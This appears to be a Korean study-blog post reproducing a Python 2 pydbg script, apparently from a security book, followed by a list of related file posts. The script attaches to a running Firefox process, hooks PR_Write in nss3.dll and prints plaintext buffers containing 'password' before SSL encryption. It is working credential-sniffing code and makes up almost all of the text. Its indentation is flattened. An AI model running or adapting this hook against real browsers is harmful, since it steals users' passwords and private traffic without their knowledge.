from pydbg import *
from pydbg.defines import *
import utils
import sys
dbg = pydbg()
found_firefox = False
pattern = "password"
def ssl_sniff(dbg,args):
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory(args[1] + offset, 1)
if byte != "\x00":
buffer += byte
offset += 1
continue
else:
break
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
return DBG_CONTINUE
# find firefox Process
for pid,name in dbg.enumerate_processes():
if name == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
dbg.attach(pid)
print "[+] Attaching to firefox.exe with PID: %d" % pid
# Get address to Hook
hook_address = dbg.func_resolve_debuggee("nss3.dll","PR_Write")
if hook_address:
hooks.add(dbg,hook_address,2,ssl_sniff,None)
print "[+] nspr4.PR_Write hooked at: 0x%08x" % hook_address
else:
print "[+] Error! Couldn't resolve hook address."
sys.exit(-1)
if found_firefox:
print "[+] Hooks set, continuing process."
dbg.run()
else:
# print "[+] Error! Couldn't find the firefox.exe process."
continue
'스터디 > └ 소스파일들' 카테고리의 다른 글
| ioctl_dump.py (0) | 2015.02.23 |
|---|---|
| ioctl_fuzzer.py (0) | 2015.02.23 |
| hippie_easy.py (0) | 2015.01.26 |
| 8시간의 대장정. (0) | 2015.01.26 |
| 책 원본 소스파일 (0) | 2015.01.20 |